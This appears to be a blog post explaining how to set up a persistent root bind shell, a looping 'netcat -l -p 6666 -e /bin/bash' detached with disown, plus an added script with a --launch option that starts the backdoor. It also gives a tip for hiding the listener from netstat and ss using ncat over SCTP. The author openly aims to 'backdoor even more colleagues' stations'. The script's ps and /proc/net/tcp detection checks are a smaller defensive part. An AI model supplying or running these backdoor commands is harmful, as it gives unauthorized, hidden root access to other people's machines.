Sometimes you may be lazy enough to want direct root shell access (no login required). Again, a really simple solution exists: redirect the socket straight to /bin/sh (or better, /bin/bash) launched under a UID 0 account.
I have two basic solutions for that:
- netcat
- inetd
The inetd method is better suited to Unix systems, where inetd often comes in the default configuration. Netcat, on the other hand, is more often found on Linux systems. With netcat, just use:
$ while 'true'; do netcat -l -p 6666 -e /bin/bash; done&
This backgrounds your infinite loop (a bit dirty...). It is unfortunately not stealthy at all: the netcat process shows up in ps and the listening socket in netstat. Note also that the -e option exists only in netcat-traditional and in nmap's ncat; the OpenBSD netcat shipped by many distributions has no -e. Furthermore, if you close the session that launched the loop, the shell hangs up its jobs: the loop subshell dies and, at best, the netcat instance already listening is reparented to pid 1 and lingers, with nothing left to respawn it.
An easy way to keep the "while" loop running once your session is gone, so that it ends up reparented to a lower-level pid (e.g. pid 1) instead of being hung up, is to "disown" it from your current shell:
before disowning:
├─gnome-terminal─┬─bash───pstree
│ ├─bash
│ ├─bash───bash───netcat
after disowning:
init─┬─6*[agetty]
├─bash───netcat
To do this, use a very simple bash builtin: disown!
$ while 'true'; do netcat -l -p 6666 -e /bin/bash; done&
[1] 3295
$ jobs
[1]+ Running while 'true'; do netcat -l -p 6666 -e /bin/bash; done &
$ disown %1
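The whole procedure above in one place, as an added example that is not the post's own code: the respawning netcat bind shell started so that it survives the launching session (nohup plus detached file descriptors, the same effect as "&" followed by "disown" in an interactive bash), together with the two host-side checks that expose it, since the post admits the listener is visible in ps and netstat. Assumptions not stated in the post: a netcat that accepts -e (netcat-traditional or nmap's ncat; OpenBSD netcat has none), and the Linux /proc/net/tcp layout. The ps and /proc/net/tcp samples are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post: the post's respawning
# netcat bind shell, started so it survives the launching session, and the
# two host-side checks a defender (or a nosy colleague) would run to find it.
# Assumed, not stated in the post: a netcat that accepts -e (netcat-traditional
# or nmap's ncat; OpenBSD netcat has no -e), and Linux /proc/net/tcp layout.

start_detached_listener() {
    # $1 = port, $2 = shell to hand the socket to (default /bin/bash).
    # nohup makes the loop ignore the SIGHUP a closing terminal sends, and
    # the redirections detach it from the tty; same effect as the post's
    # "&" followed by "disown" in an interactive bash. Prints the loop PID.
    port="$1"; shell="${2:-/bin/bash}"
    nohup sh -c 'while :; do netcat -l -p "$1" -e "$2"; done' _ "$port" "$shell" \
        </dev/null >/dev/null 2>&1 &
    echo $!
}

find_shell_listeners() {
    # Input on stdin: "ps -eo pid,ppid,args" output.
    # Output: PID of every nc/netcat/ncat whose -e/-c/--exec/--sh-exec
    # argument is a shell. This is the "seen in ps" weakness the post admits.
    awk '$3 ~ /(^|\/)(nc|netcat|ncat)$/ {
            for (i = 4; i < NF; i++)
                if ($i ~ /^(-e|-c|--exec|--sh-exec)$/ && $(i + 1) ~ /sh$/) {
                    print $1; break
                }
         }'
}

listening_tcp_ports() {
    # Input on stdin: contents of /proc/net/tcp (what netstat -lnt reads).
    # Output: decimal local port of every socket in state 0A (LISTEN).
    awk 'NR > 1 && $4 == "0A" { split($2, a, ":"); print a[2] }' |
    while IFS= read -r hexport; do
        echo "$((0x$hexport))"      # /proc gives the port in hex
    done | sort -n
}

# Constructed sample data standing in for a live host.
SAMPLE_PS=' PID  PPID ARGS
   1     0 /sbin/init
3295  2210 bash
3297  3295 netcat -l -p 6666 -e /bin/bash
3301     1 /usr/bin/ncat --sctp -l 6666 --exec /bin/sh
4000  3295 grep netcat'

SAMPLE_PROC_TCP='  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000   101        0 20331 1 0000000000000000 100 0 0 10 0
   1: 00000000:1A0A 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 31337 1 0000000000000000 100 0 0 10 0
   2: 0100007F:9D2C 0100007F:1A0A 01 00000000:00000000 00:00000000 00000000  1000        0 31412 1 0000000000000000 20 4 30 10 -1'

echo "processes handing a socket to a shell:"
printf '%s\n' "$SAMPLE_PS" | find_shell_listeners
echo "TCP ports in LISTEN state:"
printf '%s\n' "$SAMPLE_PROC_TCP" | listening_tcp_ports

# On a live box:  ps -eo pid,ppid,args | find_shell_listeners
#                 listening_tcp_ports < /proc/net/tcp
# Only when explicitly asked, start the backdoor itself (run as UID 0 for a root shell):
case "${1:-}" in --launch) start_detached_listener "${2:-6666}" ;; esac
```

Run without arguments it only exercises the two checks against the constructed samples (expect PIDs 3297 and 3301, and ports 53 and 6666); `--launch 6666` starts the listener loop and prints its PID. The established connection in the sample (state 01) is deliberately excluded, so a connected victim does not hide the listener from the port check.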
Next time, I will check some (x)inetd tricks to backdoor even more colleagues' stations.
Actually, to be a little more stealthy, it is possible to use the `ncat' tool from nmap with the --sctp option, instead of netcat.
I have noticed that neither netstat nor ss displays any info about SCTP sockets.